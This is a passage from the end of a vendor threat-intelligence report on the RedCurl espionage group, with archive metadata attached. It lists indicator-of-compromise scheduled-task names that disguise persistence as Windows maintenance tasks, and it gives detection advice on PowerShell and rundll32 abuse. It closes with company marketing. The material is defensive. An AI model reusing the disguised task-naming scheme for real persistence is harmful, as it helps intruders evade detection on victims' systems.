+ Base64(%USERNAME%)\n\n51\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Task\r\n2020-02-20 SvcRestartTaskNetworkService\r\nWDIResHost\\ResolutionHostTask\r\nUPnPHostConfSRV\\UPnPHostConfService\r\nNetworkStateChangeTask_ + Base64(%USERNAME%)\r\nMDMMaintenenceTask_ + Base64(%USERNAME%)\r\nRegistration_ + Base64(%USERNAME%)\r\nSpaceManagerService_ + Base64(%USERNAME%)\r\nSoftwareProtectionPlatform\\SvcRestartTaskNetwork_ + Base64(%USERNAME%)\r\nDiskDiagnostic\\\\Microsoft-Windows-DiskDiagnosticDataCollector_ +\r\nBase64(%USERNAME%)\r\n2020-01-21 MusUx_UpdateInterval_ + Base64(%USERNAME%)\r\nMsCtfMonitor_ + Base64(%USERNAME%)\r\nRegIdleBackup_ + Base64(%USERNAME%)\r\n2020-03-25 WindowsActionDialog_ + Base64(%USERNAME%)\r\nRMSRightsPolicyTemplateManagement_ + Base64(%USERNAME%)\r\nMDMMaintenenceTask_ + Base64(%USERNAME%)\r\n2020-07-06 DeviceDirectoryClient\\RegisterDevicePolicyChange_ + Base64(%USERNAME%)\r\nCUAssistant\\CULauncher_ + Base64(%USERNAME%)\r\nAppxDeploymentClient\\Pre-staged_app_cleanup_ + Base64(%USERNAME%)\r\n2020-07-10 DirectX\\DirectXDatabaseUpdater_ + Base64(%USERNAME%)\r\nCloudExperienceHost\\CreateObjectTask_ + Base64(%USERNAME%)\r\nCertificateServicesClient\\UserTask-Roam_ + Base64(%USERNAME%)\r\n2020-07-14 Servicing\\StartComponentCleanup_ + Base64(%USERNAME%)\r\nLocation\\WindowsActionDialog_ + Base64(%USERNAME%)\r\nAppID\\VerifiedPublisherCertStoreCheck_+ Base64(%USERNAME%)\n\n52\r\n© GROUP−IB\r\nA ppendix 2. E xamples of FSA, C1, and C 2\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nAppendix 2. Examples\r\nof FSA, C1, and C2\r\nRedCurl.FSA:\n\n53\r\n© GROUP−IB\r\nA ppendix 2. E xamples of FSA, C1, and C 2\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nRedCurl.C1:\n\n54\r\n© GROUP−IB\r\nA ppendix 2. E xamples of FSA, C1, and C 2\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nRedCurl.C2:\n\n55\r\n© GROUP−IB\r\nR e c o mm end ati ons\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nRecommendations\r\nEach analytical report issued by Group-IB’s Threat Intelligence\r\n\u0026 Attribution team contains recommendations on how to pre-vent attacks conducted by the group(s) analyzed. In this case,\r\nGroup-IB experts recommend taking the following steps:\r\n1. Analyze phishing emails detected by security tools and users.\r\n2. Monitor applications (including command line arguments) that\r\nare often used by cybercriminals during initial compromise\r\n(Microsoft Office, Acrobat Reader, archivers, etc.).\r\n3. Restrict PowerShell execution on systems where it is unnec-essary. Monitor executable scripts and pay close attention\r\nto powershell.exe processes with long Base64-encoded strings\r\nin arguments.\r\n4. Monitor arguments with which rundll32.exe is launched.\r\n5. Monitor and verify tasks created in the scheduler.\r\n6. Block access to cloud storage devices that are unnecessary.\r\n7. Hunt for LNK files that point to documents or images but also\r\nhave rundll32.exe or powershell.exe in the file path.\n\nGroup-IB Threat\r\nIntelligence and\r\nResearch Centers\r\n• Europe\r\n• Russia\r\n• Middle East\r\n• Asia-Pacific\r\nGroup-IB is a global leader in high-fidelity\r\nThreat Hunting and Intelligence, best-in-class\r\nfraud prevention solutions, and high-profile\r\ncyber investigations.\r\n• Globally distributed cybercrime\r\nmonitoring infrastructure\r\n• Digital Forensics \u0026 Malware Analysis Laboratory\r\n• High-Tech Crime Investigations\r\n• CERT-GIB: 24/7 monitoring centers and\r\nComputer Emergency Response Team\r\nOSCE INTERPOL\r\nAND EUROPOL\r\nPartner and active collaborator\r\nin global investigations\r\nRecommended by the\r\nOSCE as a cybersecurity\r\nsolutions provider\r\nRanked among the Top 10 cybersecurity\r\ncompanies in the APAC region\r\naccording to APAC CIO Outlook\r\nAPAC\r\nTOP 10\r\nAMSTERDAM\r\nMOSCOW\r\nDUBAI\r\nSINGAPORE\n\nThreat Intelligence\r\n\u0026 Attribution\r\nSystem for analyzing and\r\nattributing cyberattacks, threat\r\nhunting, and protecting network\r\ninfrastructure based on data\r\nrelating to adversary tactics,\r\ntools, and activity\r\nFraud Hunting\r\nPlatform\r\nClient-side digital identity\r\nprotection and fraud prevention\r\nin real time\r\nThreat Hunting\r\nFramework\r\nAdversary-centric detection\r\nof targeted attacks and\r\nunknown threats for IT and\r\nOT environments\r\nAtmosphere: Cloud\r\nEmail Protection\r\nPatented email security\r\ntechnology that blocks,\r\ndetonates and hunts for the\r\nmost advanced email threats\r\nDigital Risk\r\nProtection\r\nAI-driven platform for digital risk\r\nidentification and mitigation\r\n©GROUP−IB\r\nGroup-IB’s\r\ntechnologies\r\nand innovations\r\nGroup-IB’s experience in performing successful global\r\ninvestigations with state-of-the-art threat intelligence\r\nand detecting cybercriminals at every stage of attack\r\npreparation has been fused into an ecosystem of highly\r\nsophisticated software and hardware solutions\r\ndesigned to monitor, identify, and prevent cyber threats.\r\nOur mission is to protect our clients in cyberspace at all\r\ncosts using innovative technologies and services.\r\nFORRESTER\r\nFROST \u0026 SULLIVAN\r\nGARTNER IDC\r\nFORRESTER\r\nFROST \u0026 SULLIVAN\r\nKUPPINGERCOLE\r\nANALYSTS AG\r\nKUPPINGERCOLE\r\nANALYSTS AG\r\nGroup-IB’s technologies\r\nare recognized by the\r\nworld’s leading research\r\ncompanies:\r\n— Innovation Excellence\r\n— Product Leader\r\n— Innovation Leader\r\nGARTNER\r\nNEW\n\n©\r\nGROUP−IB\r\nIntelligence-driven services\r\nGroup-IB’s technological leadership and\r\nR\u0026D capabilities are built on the company’s 18 years\r\nof hands-on experience in performing successful\r\ncybercrime investigations worldwide and the 70,000\r\nhours of cybersecurity incident response accumulated\r\nin our leading forensic laboratory and CERT-GIB.\r\nHI-TECH CRIME\r\nINVESTIGATIONS\r\nDigital Forensics\r\nMalware Analysis\r\nGroup-IB investigates\r\n• High-tech crimes\r\n• Data leaks\r\n• Corporate and financial crimes\r\n• Sophisticated attacks against\r\ncritical infrastructure\r\nSECURITY AND COMPLIANCE\r\nASSESSMENTS\r\n• Penetration Testing\r\n• Source code analysis\r\n• Compromise Assessment\r\n• Red Teaming engagements\r\n• Incident Response Readiness\r\nAssessment\r\n• Compliance Auditing\r\nCYBER EDUCATION CENTER\r\nTechnical courses\r\n• Incident Response\r\n• Malware analysis\r\n• Threat Hunting and more\r\nNon-technical workshops\r\n• Digital hygiene\r\n• Personal cybersecurity\r\n• Reputation management and more\r\nWorkshops and masterclasses for\r\nuniversity and high school students\r\nTHREAT HUNTING\r\nAND INCIDENT RESPONSE\r\n• CERT-GIB: 24/7 incident\r\nresponse center\r\n• Proactive threat hunting\r\n• On-prem incident response\r\nfor complex attacks\r\n• Investigation subscription\r\nworld-class\r\nexperts\r\nhours of incident\r\nresponse\r\nsuccessful investigations\r\nworldwide\r\npractical\r\nexperience\r\n550+ 70,000+ 1,300+ 18 years\r\nFORRESTER\r\nGARTNER\n\nwww.group-ib.com\r\ngroup-ib.com/blog/\r\ninfo@group-ib.com\r\n+65 31 59 37 98\r\ntwitter.com/groupib_gib\r\nhttps://www.facebook.com/groupibHQ\r\nPREVENTING\r\nAND INVESTIGATING\r\nCYBERCRIME\r\nSINCE 2003", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://go.group-ib.com/report-redcurl-en?_gl=1*t8hou9*_ga*MTY4NTg1NzA4Ny4xNzA4MDk1MjMx*_ga_QMES53K3Y2*MTcwODA5NTIzMC4xLjEuMTcwODA5NjAyNy45LjAuMA.." ], "report_names": [ "report-redcurl-en?_gl=1*t8hou9*_ga*MTY4NTg1NzA4Ny4xNzA4MDk1MjMx*_ga_QMES53K3Y2*MTcwODA5NTIzMC4xLjEuMTcwODA5NjAyNy45LjAuMA.." ], "threat_actors": [], "ts_created_at": 1777949136, "ts_updated_at": 1777949196, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.pdf", "text": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.txt", "img": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.jpg" } }